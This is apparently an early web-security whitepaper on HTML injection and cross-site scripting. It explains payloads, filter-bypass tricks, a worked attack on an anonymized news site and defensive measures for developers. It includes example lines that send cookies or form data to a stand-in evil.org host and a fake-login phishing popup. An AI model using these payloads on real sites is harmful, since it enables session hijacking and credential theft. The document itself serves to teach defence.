







HTML Code Injection and Cross-site scripting

Understanding the cause and effect of CSS (XSS) Vulnerabilities



As web-based applications have become more sophisticated, the types of vulnerabilities are capable of exploiting has rapidly increased. A particular class of attacks commonly referred to as “code insertion” and often “Cross-Site Scripting” has become increasingly popular. Unfortunately, the number of applications vulnerable to these attacks is staggering, and the varieties of ways attackers are finding to successfully exploit them is on the increase. Analysis of many sites has indicated that not only are the majority of sites vulnerable, but they are vulnerable to many different methods and much of their content is affected. Introduction Web servers delivering dynamic content to Internet clients constitute an integral component of most organisations online service offerings. The ability to tune content and respond to an individual client request represents standard functionality for any successful site. Unfortunately, due to poorly developed application code and data processing systems, the majority of these successful sites are vulnerable to attacks that focus upon the way HTML content is generated and interpreted by client browsers. Attackers are often able to embed malicious HTML-based content within client web requests. With sufficient forethought and analysis, attackers can exploit these flaws by embedding scripting elements within the returned content without the knowledge of the sites visitor.

Although the potential dangers have been known for several years now, the recent successes and improved understanding of cross-site scripting attacks has increased the importance of correctly handing user input within dynamically generated web content. High profile sites have already been shown to be susceptible to cross-site scripting attack. Future attacks are likely to become more sophisticated and, through automation and exploitation of client browser vulnerabilities, many times more devastating.

This document aims to educate those responsible for the management and development of commercial online services by providing the information necessary to understand the significance of the threat, and provide advice on securing applications against this type of attack. Code Insertion The success of this type of attack hinges upon the functionality of the client browser. In HTML, to distinguish displayable text from the interpreted markup language, some characters are treated specially. One of the most common special characters used to define elements within the markup language is the “<“ character, and is typically used to indicate the beginning of an HTML tag. These tags can either affect the formatting of the page or induce a program that the client browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program).

As most web browsers have the ability to interpret scripts embedded within HTML content enabled by default, should an attacker successfully inject script content, it will likely be executed within context of the delivery (e.g. website, HTML help, etc.) by the end user. Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.

While this document largely focuses upon the threat presented through the injection of malicious scripting code, other tags may be inserted and abused by an attacker. Consider the <FORM> tag – by inserting the appropriate HTML tag information, an attacker could trick visitors to the site into revealing sensitive information by modifying the behaviour of the existing form for instance. Other HTML tags may be inserted to alter the appearance and behaviour of a page (e.g. alteration of an organisations online annual accounts or presidents statement?).

It is important to understand the HTML tags that are most commonly used to carry out code insertion tags. The following table details the most important attributes of these tags. However, it is important to note that alternative “in-line” scripting elements may be used and interpreted by the current generation of web browsers, such as javascript:alert('executing script') . HTML Tag Description <SCRIPT> Adds a script that is to be used in the document.

Attributes: type = Specifies the language of the script. Its value must be a media type (e.g. text/javascript). This attribute is required by the HTML 4.0 specification and is a recommended replacement for the “language” attribute.

language = Identifies the language of the script, such as JavaScript or VBScript.

src = Specifies the URL of an outside file containing the script to be loaded and run with the document. (Netscape only) Supported by: Netscape, IE 3+, HTML 4, Opera 3+ <OBJECT> Places an object (such as an applet, media file, etc.) on a document. The tag often contains information for retrieving ActiveX controls that IE uses to display the object.

Attributes: classid = Identifies the class identifier of the object.

codebase = Identifies the URL of the object’s codebase.

codetype = Specifies the media type of the code. Examples of code types include audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)

data = Specifies the URL of the data used for the object.

name = Specifies the name of the object to be referenced by scripts on the page.

standby = Specifies the message to display while the object loads.

type = Specifies the media type for the data.

usemap = Specifies the imagemap URL to use with the object. Supported by: Netscape, IE, HTML 4 <APPLET> Used to place a Java applet on a document. It is depreciated in the HTML 4.0 specification in favour of <object> tag.

Attributes: code = Specifies the class name of the code to be executed (required).

codebase = The URL from which the code is retrieved.

name = Names the applet for reference elsewhere on the page. Supported by: Netscape, IE 3+, HTML 4 <EMBED> Embeds an object into the document. Embedded objects are most often multimedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for controlling the playback of the file. The closing tag is not always required, but is recommended. The tag was dropped by the HTML 4.0 specification in favour of the <object> tag.

Attributes: hidden = Hides the media file or player from view when set to yes.

name = Specifies the name for the embedded object for later reference within a script.

pluginspage = Specifies the URL for information on installing the appropriate plug-in.

src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only)

code = Specifies the class name of the Java code to be executed. (IE only)

codebase = Specifies the base URL for the application. (IE only)

pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only)

type = Specifies the MIME type of the plug-in needed to run the file. (Netscape only) Supported by: Netscape, IE 3+, Opera 3+ <FORM> Indicates the beginning and end of a form.

Attributes: action = Specifies the URL of the application that will process the form.

enctype = Specifies how the values for the form controls are encoded when they are submitted to the server.

method = Specifies which HTTP method will be used to submit the form data.

target = Specifies a target window for the results of the form submission to be loaded ( _blank, _top, _parent, and _self). Supported by: All Malicious Code An embedded code attack is heavily dependant upon the delivery mechanism. Thus the delivery method often dictates the audience the script will potentially affect.

It is interesting to note that such attacks have been around since before the Internet and HTML. Back in the days of dial-up Bulletin Boards Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII and later, the use of vector drawing languages permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt along time ago to rigorously control the content that be could submitted.

An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took the user submitted text from a standard POST form. This data was then added to the discussion page, without any further processing. Users often included text formatting tags to bold, italicise or colour their text – making a greater visual impact to their message. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, resulting in the unintentional effect of altering every following message on the page. Now consider the implications of a user embedding the following two code snippets in their posting and what the implications would be to everyone viewing the message. Hello World! <SCRIPT>malicious code</SCRIPT> Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov"> Unfortunately, attackers are finding ever more ingenious methods of encoding their embedded attacks, and consequently many more sites are vulnerable.

Of particular importance is the abuse of trust. Consider a trusted site with a poorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site sends a page back to the browser including the value of criteria, which consequently forces the execution of code from the evil attackers’ server. For example; <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</A> In the attack above, one source is inserting code into pages sent by another source. It should be noted that this attack:

• disguises the link as a link to http://trusted.org,

• can be easily included in an HTML email message,

• does not supply the malicious code inline, but is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at anytime.

This class of vulnerability is popularly referred to as cross-site scripting (CSS or sometimes XSS). Cross Site Scripting A cross-site scripting vulnerability is caused by the failure of an web based application to validate user supplied input before returning it to the client system. “Cross-Site” refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim’s browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions which can result not only in cookie theft but account hijacking, changing of web application account settings, spreading of a webmail worm, etc.

Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox.

The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn’t necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.

The most popular CSS/XSS attack (and devastating) is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victims active session, completely bypassing the authentication process. Unfortunately, the mechanism of the attack is very simple and can be easily automated. A detailed paper by iDefence goes into great detail explaining the process, but can be quickly summarised as follows: The attacker investigates an interesting site that normal users must authenticate to gain access to, and that tracks the authenticated user through the use of cookies or session ID’s The attacker finds a CSS vulnerable page on the site, for instance http://trusted.org/ account.asp. Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims. Embedded within the special link are some coding elements specially designed to transmit a copy of the victims cookie back to the attacker. For instance: <img src="http://trusted.org/account.asp?ak=<script>document.location .replace('http://evil.org/steal.cgi?'+document.cookie);</script>"> Unknown to the victim, the attacker has now received a copy of their cookie information. The attacker now visits the web site and, by substituting his cookie information with that of the victims, is now perceived to be the victim by the server application. Note that Cross-site scripting is commonly referred to as CSS and/or XSS. Understanding Code Insertion To date, security professions have discovered an ever increasing number of methods for potentially embedding code within poorly configured web applications. The following are some of the more common methods for doing so. Inline Scripting http://trusted.org/search.cgi?criteria=<script>code</script> http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'> </SCRIPT> http://trusted.org/COM2.IMG%20src= "Javascript:alert(document.domain)" Forced Error Responses http://trusted.org/<script>code</script>

This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data. http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>

If a Java application such as a servlet fails to handle an error gracefully, and allows stack traces to be sent to the users browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of the request. http://trusted.og/servlet/ org.apache.catalina.servlets.WebdavStatus/<script>code</script>

In the example above, when the Tomcat servlet is called with the training illegitimate request, an error page is served containing the offending text verbatim. Non <SCRIPT> Events " [event]='code'

In many cases it may be possible for an attacker to insert an exploit string, with the above syntax, into a HTML tag that should have been like: <A HREF="exploit string">Go</A>

resulting in:

<A HREF="" [event]='code'">Go</A> <b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>

As the client cursor moves over the bolded text, an intrinsic event occurs and the JavaScript code is executed. JavaScript Entities <img src="&{alert('CSS Vulnerable')};">

The special character “&” is sometimes interpreted as a new JavaScript code segment (entity). Typical Payloads Formatting <img src = "malicious.js"> <script>alert('hacked')</script> <iframe = "malicious.js"> <script>document.write('<img src="http://evil.org/'+document.cookie+'") </script> <a href="javascript:…">click-me</a> In sertion Example Dynamic URL Generation Consider an application built for running on Microsoft’s Internet Information Server (IIS) web server platform. Dynamic content is delivered through IIS’s Active Server Pages (ASP).

Within the sample page, a dynamically built HTML tag for refining search parameters is constructed as follows:

<A HREF="http://trusted.org/search_main.asp? searchstring=SomeString">click-me</A>

and the ASP code required to generate a further query based upon this submitted information is: <%

var BaserUrl = "http://trusted.org/search2.asp?

searchagain=";Response.Write("<a href=\"" + BaseUrl

+ Request.QueryString("SearchString") + "\">click-me</a>" )

%> If the attacker was to replace the “SomeString” with their own code, as indicated next:

<a href="http://trusted.org/search_main.asp?

SearchString=%22+onmouoseover%3D%27ClientForm%

2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%

3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%

2Esubmit%3B%27">FooBar</a> The likely result found in the dynamically generated ASP page will be:

<A HREF="http://trusted.org/search2.asp?

searchagain="" onmouoseover='ClientForm.

action="evil.org/get.asp?Data=" +

ClientForm.PersonalData;ClientForm.

submit;'">click-me</A> In this case, the attacker has added to the HTML page code, and used the DOM of the HTML page to redirect data in some form to the attacker’s web site. Bypassing Anti-CSS Filters A key function of any application filtering process will be the removal of possible dangerous special characters. However, in many circumstances it may be difficult to filter a large range of these characters due to the applications unique requirements.

Corporate application developers must carefully evaluate how their code will perform with a variety of attack strings. In addition, they should fully understand the different methods that special characters can be encoded.

One of the most popular alternative character representations is HTML escaped encoding, sometimes mistakenly referred to as Unicode encoding. In this system, the HEX value of the ASCII character is prefixed with the “%” character. Char ; / ? : @ = & < > “ # Code %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23 Char { } | \ ^ ~ [ ] ` % ‘ Code %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27 To better understand the processes behind bypassing Anti-CSS filtering mechanisms, a series of detailed examples are provided below. Inserting Malicious Code Simple Filtering of “<“ and “>“

Many applications that implement some kind of content filtering will typically filter out the “<“ and “>“ characters at the client-side. At first glance, this looks like an effective way of ensuring <script> type HTML tags are not possible. Unfortunately, not only client-side code easy to bypass, in many circumstances it can be bypassed using a mix of alternative character representations and other special characters.

Consider a routine that removes the “<“ and “>“ special characters:

document.write(cleanSearchString('<>')); The attacker now uses an alternative coding for the filtered characters, “\x3c” and “\x3e” respectively, and initialises their code with “’) +” to escape out of the routine.

' ) + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e' Commenting out malicious code

Consider an application that filters content on behalf of it clients by causing any scripting content to be “safely” commented out. For instance, <script>code</script> is filtered by the application to become:

<COMMENT>

<!--

code (NOT PARSED BY FILTER)

//-->

</COMMENT> Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that will close the <comment> filter process. For example, the attacker can send the following code:

<script>

- -->

</COMMENT>

<img src="http://none" onerror="alert(document.cookie);window.open( http://evil.org/fakeloginscreen.jsp); ">

</script> After processing by the filter, the following code is embedded in the returned document:

<COMMENT>

<!--

- -->

</COMMENT>

<img src="http://none" onerror="alert(document.cookie);window.open(http://evil.org/ fakeloginscreen.jsp);">

</COMMENT> This particular attack was originally designed to bypass the security filtering processes of a large web-mail provider, and would have been embedded in HTML email content. Users viewing the email would automatically be prompted with a fake login screen, making for an easy method of harvesting user names and passwords. Separate Window Handling

A popular method of handling potentially dangerous URL information is to force the URL to be opened in a new browser window. This then causes and malicious code to be executed in the context of a different DOM, using the ‘target=“_blank”’ addition to the HTML <HREF> tag.

Unfortunately, in many online email applications it is possible to bypass after analysing the “harmless” link supplied by the site.

Consider a site that parses the content,

<a href="javascript:…">click-me</a>

and, after processing, becomes:

<a href="javascript:…" target="_blank">click-me</a>

Causing the URL to be opened in a new window. However, if the attacker constructs his HREF as follows,

<a href="javascript:..." foo="bar>click-me</a>

it will be interpreted as:

<a href="javascript:..." foo="bar target="_blank">click-me</a>

causing the code to be executed in the same page, under the same DOM. Escaped JavaScript Entities

In cases where almost all special characters have are filtered from user supplied strings, attackers must encode the entire attack string.

Consider the following URL:

http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL %27%29%7d%3b&apropos=pos2 The “%26%7balert%28%27EVIL%27%29%7d%3b” resolves to &{alert('EVIL')}; causing in this instance an unexpected JavaScript alert window to popup, with the text “EVIL”. Web Integration As client web browsers have evolved, they have incorporated an increasingly diverse range of functions. At the same time, many common desktop applications have extended their functionality to replicate or incorporate the functionality of these same browsers. While the security flaw may be HTML injection, and more specifically CSS, the avenues available for a malicious user or attacker to initiate the attack are becoming ever broader. As is already evident, a popular “personalised” delivery mechanism has now become HTML email. Unfortunately, the delivery methods are becoming so diverse that no “single” security solution is available to prevent the attack. Consider the significance of the following delivery mechanisms. The Flash! Attack Flash! is a popular application for displaying animated visual information. Is has it’s own development language (ActiveScript) for creating sophisticated interactive menus, animated movies and games. The most popular web browsers often install the interpreter for these files by default and, due to the large number of sites that use the technology; many people will install the interpreter even if it wasn’t originally available with their web browser.

ActiveScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between the Flash! interpreter and the web browser, it is possible to insert scripting code that would be successfully interpreted by the client web browser. For instance, instead of:

getURL("http://www.technicalinfo.net") It is possible to specify scripting code:

getURL("javascript:alert(document.cookie)") Thus, it is possible to embed potentially dangerous scripting elements within a common file format. The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filter out HTML <script> type tags) and local security web browser settings.

For an attack to be successful, the dangerous Flash! file (typically terminating in a “.swf” extension) must be embedded within HTML data for viewing by remote clients. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for instance: <EMBED

src="http://evil.org/badflash.swf" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?

P1_Prod_Version=ShockwaveFlash"

type="application/x-shockwave-flash"

width="100"

height="100">

</EMBED> The Impact The impact of malicious code insertion is often difficult to quantify and will change as new functionality or interactions are incorporated into both web servers and client browsers. Already, users may unintentionally execute scripts written by an attacker when they follow untrusted links in web pages, mail or instant messages, or any other application capable of displaying HTML content (e.g. Microsoft Help). For this reason, a series of examples best illustrate the diversity and impact of potential threats. Consider the following examples: An attacker often has access to the document retrieved since the malicious scripts are executed in a context that appears to have originated from the trusted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacker.

An attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server.

An attacker may be able to poison the sites persistent cookies, thus modifying the cookie content and causing malicious code to be executed each time the user visits the trusted site. The malicious code is stored as a field variable within the cookie, and executed each time the site dynamically generates page content without the correct processing.

An attacker may be able to cause a “hidden window” to start on the client machine and us this to key-log all browser interaction of the victim. Should the victim later visit sites requiring authentication, the attacker could harvest this information.

CSS type attacks can occur over SSL-encrypted connections. The victim, accessing a trusted host over HTTPS, may still execute an attackers code unintentionally. If the attacker references document components on a remote host, the victims client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on a SSL-capable web server.

An attacker may construct the malicious code to reference internal resources. Thus, an attacker may gain unauthorised access to an Intranet web server. Only one page on one web server in a domain is required to compromise the entire domain.

An attacker may be able to bypass policies that prevent the victim browser from executing scripts. For example, Internet Explorer security “zones” may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed their code within the content of a trusted internal host.

An attacker may use a social engineering aspect to the attack. Consider an application that requires clients to complete a form to set up their account. An attacker may be able to insert malicious code into their application data. A quick phone call to the corporate help-desk asking for advice on their account may cause the execution of the malicious code on the help-desk system.

Even if the victims’ web browser does not support scripting, an attacker may still be able to alter the content of the page – affecting its appearance, behaviour or normal operation. To date the most popular application content to be targeted by attackers has been web pages that: Return results based upon user input to search engines,

Process credit card information,

Store and user supplied content in databases and cookies for later retrieval. Vulnerability Checking Finding out if your application is vulnerable to a code insertion attack is often very simple. The key lies in the analysis of the dynamically generated client-side HTML content. The following process has been frequently used in the past. For each visible input field (these may be located in an HTML form, or represented in the URL as “variable=“), try the most obvious scripting formats:

<script>alert('CSS Vulnerable')</script>

<img csstest=javascript:alert('CSS Vulnerable')>

&{alert('CSS Vulnerable')};

In any case, should an alert message popup with the text “CSS Vulnerable”, the application component is vulnerable - specifically the input field just checked. If, either of the above scripting checks cause the HTML page to display incorrectly, the application component may still be vulnerable. For each visible variable, submit/substitute the following string:

'';!--"<CSS_Check>=&{()} (Note that the string begins with two single-quotes)

On the resultant page, search for the string “<CSS_Check>“. If you discover “<CS_Check>“, it is quite probable that the application component is vulnerable. However, if the word CSS_Check is no longer enclosed in something similar to %ltCSS_Check%gt, then it may not be vulnerable. If input is displayed literally at ANY point in the document, it can be used to divert the flow of execution to an attacker-supplied payload. Having located the word CSS_Check, verify what (if any) other characters have be altered or filtered from the original string “ '';!--"<CSS_Check>= &{()} ”. Depending upon the filtered characters, the application component may still be vulnerable. Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If these characters exist, unfiltered, in responses to the test string of part 3 (above) – then there is a high probability that the application component is vulnerable. Moving on from the obvious fields, repeat the process for all the hidden fields not normally editable at the client end. The best method of doing this is through the use of a free local host proxy server such as Achilles by DigiZen Security group and WebProxy by @stake. The proxy servers allow the editing of HTTP requests as they leave the client application, before being finally sent to the server application. In many cases, data will be submitted via the HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components that require the HTTP POST command to submit data. It is a simple process of turning a POST into a GET submission. If the application component fails to respond to the GET the same way as it did for the POST submission, it is probably not vulnerable to a URL based inline scripting attack. Putting It All Together To bring together many of the ideas and processes discussed earlier in this document, an example can be used to bring it all together. In this example, the anonymous site has a search engine that responds to client data submissions. Normally the site would look like this: In our first test, we try submitting our first test string <script>alert('CSS Vulnerable')</script>, and receive the following response: Notice the strange response in the “Your Search” box on the left. Zoomed in below. Taking a closer look at the content source, we notice that our sample code appears 21 times in the document, in various formats. It appears 10 times in a format similar to:

<SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/

anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')

</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT> 9 times in a format similar to:

<a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript

%3E&pager.offset=10">2</a> And twice in the format similar to:

document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\

"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>'); Obviously there are three different server-side processing routines for processing client search data. In the first type (ad.uk.doubleclick.net format), it appears that the processing routine changes the case of characters and changes white space to the underscore (“_”). The second type (href=) converts special characters into their escape-encoded formats, and white space into the “+” character. The third type (document.writeln) places the complete string within a document.writeln JavaScript routine. Several opportunities present themselves here. To make the site execute the JavaScript alert box for each type, we need to force the <script> tags outside of any other HTML tags. Thus, for each type, the following methods will work: ><script>alert('CSS Vulnerable')</script><b a=a a></a><script>alert('CSS Vulnerable')</script> \'><script>alert%28\'CSS Vulnerable\'%29</script>< The result is the following alert box (multiple times): However, for this example, we shall focus on the last type (document.writeln). Since it is possible to inject code into the returned HTML page to the anonymous News site, to make the attack interesting, we shall “write” our own fake news article. Due to the maximum length of any string we can send to the site, and the likely length of the fake news article, we shall create a JavaScript include file (.js) which we will load in to the page using: \'><script%20src%3dhttp://evil.org/faked.js></script> In this example, the include file will use multiple document.write statements to create the fake news article. There are several key features to the include file, and include - Use of HTML <DIV> tags to position the content on the page. Doing so allows the attacker to cover over existing content as they wish.

Using a table to keep all the article text together.

Rewriting of the URL source field at the top of the browser.

Rewriting of the browser status bar. From the first few lines of the fake.js file:

var d = document;

d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2">

<TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');

d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>'); So far, everything we have tested on the site makes use of the existing form to submit the attacker’s code. This submission is done by a HTTP POST command, such as:

POST /Search HTTP/1.0

Referer: http://www.anonymous.com/Search

Accept-Language: en-gb

Content-Type: application/x-www-form-urlencoded

Host: www.anonymous.com

Content-Length: 135

Pragma: no-cache

dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js>

</script>newSearch=true&pro=IT&searchOption=articles It is a simple process to convert the HTTP POST into a single URL. Unfortunately for the anonymous news site, the web application does not differentiate the methods of receiving data. Thus the following attack URL allows the attacker to place his own content “on” the site.

http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script

%20src%3dhttp://evil.org/faked.js></script>newSearch=true&pro=IT

&searchOption=articles Defending Against the Attack Solutions for Users The only clear-cut solution for the user is to disable all scripting languages on their computer. Unfortunately, it is highly likely that much functionality of the sites regularly visited will be removed. Thus users should only pursue this option if they require the lowest possible level of request. Alternatively, users must be selective as to the sites they trust, and the sources of URL links. Again, the disabling of scripting languages will not prevent attackers influencing the appearance of content provided by trusted sites by embedding other HTML tags in the URL link.

With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker’s web site may still use scripted code to alter the representation of the links in the client browser.

Unfortunately many integrated applications increase the threat of scripting code being executed on the users system, particularly through the use of embedded objects such as Flash! .swf files. To prevent these types of attacks, users must either uninstall the interpreters or ensure protection systems are capable of stopping the execution of such content. It is envisaged that popular anti-virus and personal intrusion detection systems will eventually be capable of this.

Frankly, the onus for protecting users against code insertion and CSS type attacks relies upon the development of secure server-side applications. Ideally, the application should correctly handle and comment submitted data. Unfortunately, the likelihood that the application developer will miss some subtle character representation is quite high. Solutions for Developers and Organisations As no two applications are ever the same, application developers will need to tune their security countermeasures as defined by business requirements. The key to preventing applications being vulnerable to code injection and CSS type attacks is by ensuring that dynamically generated page content does not contain undesired HTML tags. The most likely sources of malicious data are likely to be: Query strings

URL’s and pieces of UL’s

Posted data

Cookies

Persistent data supplied by users, and retrieved at a later date (such as from databases) The following methods or design considerations can be implemented by developers to better secure their application against HTTP based attacks, not just CSS. Limit Server Responses In many cases it may be possible to limit the amount of “personalised” data that will be returned to client browsers through the use of generic responses.

For example, consider a site that that displays the greeting “Hello, Gunter!” in response to http://trusted.org/greeting.jsp?name=Gunter. It would be a preferable security option to sacrifice this dynamic response with a hard-coded response such as “Hello, User!” Enforce Response Lengths For the majority of applications, the developer should be able to limit the maximum length of any user-supplied strings. Although initially enforced at the client-side, all strings should also be checked at the server-side. Where possible, enforce the limitation of the maximum necessary string length by truncating any longer responses. HTTP Referer As part of the HTTP standard, provision is made for a field header called “referer”. When a client browser follows a link or submits form data, the referer field should contain the URL of the page that the link or data came from. If possible, the web application should check the referer field and reject data if it didn’t come from the correct host or link. HTTP Referer Usually appearing in the HEAD of any HTTP requests:

Referer: http://www.anonymous.com/Search

Accept-Language: en-gb

Content-Type: application/x-www-form-urlencoded

Host: www.anonymous.com Advantages: An attack would fail irrespective of any character or HTML tag filtering policies. Disadvantages: There is a risk of blocking legitimate links and form submission. As the referer field is optional, rejecting a blank referer field would prevent the application supporting certain client browsers.

In some cases, the referer field may be blank or missing if the user followed a link that may be referenced locally (e.g. email messages, cached pages and favourites).

Some browsers deliberately clear the referer field when navigating from a secure (HTTPS) page to an unsecure (HTTP) page. Embedded Files and Objects As witnessed by the Flash! Attack, attackers may be capable of embedding scripting components that can be interpreted by the client web browser and used to conduct a CSS attack.

For inclusion within a HTML based document, embedded files and objects are referred to using the HTML <EMBED> and <OBJECT> tags. Several options are available for decreasing the threat of embedded CSS attacks: The safest option is to treat <EMBED> and <OBJECT> tags the same as <SCRIPT> tags, and disallow any content to be submitted to the application that contains such data strings.

Depending upon the format of the embedded object, it may be possible parse filter content based upon content within the object. For instance, with Flash! files, it would be possible to remove all instances where the getURL() field contains a reference to a site other than the current application host. Alternatively, it may be possible to specify the target window as “_blank” and thus stopping any potential scripting code from being executed under the hosting domains privileges. HTTP POST not GET In the majority of cases, remote code insertion attacks are likely to be through the submission of user data in HTML forms. One prevention step is to ensure that form submission is only ever done through HTTP POST requests. Allowing HTTP GET request submissions will allow potentially attackers to craft distributable URL’s containing the offending code.

When coding the server-side application, it is extremely important to ensure that the client-side data can only be received through HTTP POST variables. Most web hosting applications will indicate the variable delivery method. HTTP POST not GET Forcing the use of HTTP POST over GET is a simple process and easy to implement. Advantages: Almost always removes the threat of URL based code insertion attacks. Disadvantages: Application users may not be able to save URLs to their favourites for quick access to the application component. Cookie Inspection Many applications utilise cookies for managing the state of the communication, and local storage of information relevant to the user. Application developers must ensure that all cookie information is thoroughly checked and filtered before insertion into the HTML documents. Attackers modifying persistent cookies can also make their attacks persistent. URL Session Identifier In some circumstances, the use of a unique session identifier for each valid user can be used to prevent remote exploitation of URL based code insertion attacks.

As a user arrives at the web site, they are automatically allocated a unique session ID. This session ID can ONLY be obtained from one page on the site (usually the start/home page). Should a visitor try to access any other page within the site without a valid session ID, they are automatically redirected to the start page and issued one.

Should an attacker discover a CSS flaw with one application component, any crafted exploit URL will have to contain a valid session ID. By rigorously controlling the session ID timeout, the attacker will not be able make use of the flaw (other than affecting the attacker locally) outside of this period.

For additional security, the session ID could also be made in include a hashed version (or checksum) of the client browser’s IP address. URL Session Identifier URL session identifiers are often visible as:

http://trusted.org/app.jsp?session=h3uf8309ai9.830988 Advantages: Likely to stop all long term insertion attacks.

With the addition of IP address information, session ID’s implemented this way will stop all URL based code insertion attacks. . Disadvantages: It is likely that the session ID will be allocated, and used, over HTTP. This session ID will thus be sent in the clear and will display in most logging systems (e.g. firewalls, proxies etc.). Developers must ensure that a different session ID is allocated and used during secure transactions.

This security measure can still be defeated by man-in-the-middle type attacks. Character Sets The success of code injection attacks relies heavily on the use of non a-Z characters. Some small measure of security can be gained by ensuring that an appropriate data is filtered using an appropriate character set. Character Sets A popular character set is ISO 8859-1, which was the default in early versions of HTML and HTTP.

Ensure all content pages include the following:

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> Advantages: Character submission in limited by the client web browser itself.

Can potentially reduce the amount of client-side code required to check user-supplied text. Thus it may also reduce the total size of the HTML content – making for faster download times. Disadvantages: Can be easily bypassed.

Will have an effect on character localisation issues. Dangerous Content Certain characters are of special significance when inserted into web pages or URL content. These characters are based upon the HTML specifications, context and browser interpretation. If input to the application (or web site) is not correctly validated, the following problems may occur: Session information from client cookies may be set and read,

User input could be intercepted,

Data integrity can be compromised,

Foreign scripting components can be executed by the client browser in the context of the trusted source. Character Significance < The less-than character introduces a HTML tag. > The greater-than character is sometimes interpreted by client browsers as the end of a HTML tag, and assumes that the author of the page omitted an opening < in error. “ The double quote character is often interpreted as the end of an attribute character. % The percentage character is frequently used for encoding characters, such as their Unicode representation & The ampersand introduces a character entity. It is possible to combine the double quote and ampersand characters (“& “ extravalue”) to combine character entities within a HTML tag. Within a URL, the & introduces a character entity. Also, often used by UNIX based operating systems for command execution. ' HTML tag attribute values can be enclosed within single quotes. SPACE Although most good developers prefer to quote attribute values, it is possible to omit these entirely as long as white-space characters are introduced. The SPACE character can be used as white-space. When used within URL information, the SPACE character is interpreted as the end of a URL. TAB Following the same white-space principals as the SPACE character, TAB may also be used. When used within URL information, the TAB character is interpreted as the end of a URL. ; | ! Semicolons, Pipes and exclamation characters for additional command execution - The dash (or minus sign) can be used in database queries, and the creation of negative numbers. / \ The forward-slash and back-slash are often used for faking paths and queries. ( ) { } [ ] Brackets, curly brackets and square brackets are often used as script, program or regex expressions. * Often used in database queries for “all” ? $ @ : Question mark, Dollar, At and Colon characters are often used as script or programming markers. Hex Version The hex value of a character may be used, often done for non-printable characters. Such as:

x00 Null bytes for truncating strings

x04 EOF for faking the end of files

x08 Backspace x0a New Line for extra command execution

x0d New Line for extra command execution

x1b Escape character for breaking out of procedures

x20 Spaces for faking URLs and other names

x7f Delete Non-ASCII Within a URL, non-ASCII characters (characters values above 128 in the ISO8859-1 encoding) are not allowed. When dealing with potentially dangerous user supplied data, organisation may approach from three different angles: Encode output based upon input parameters.

Filter input parameters for special characters.

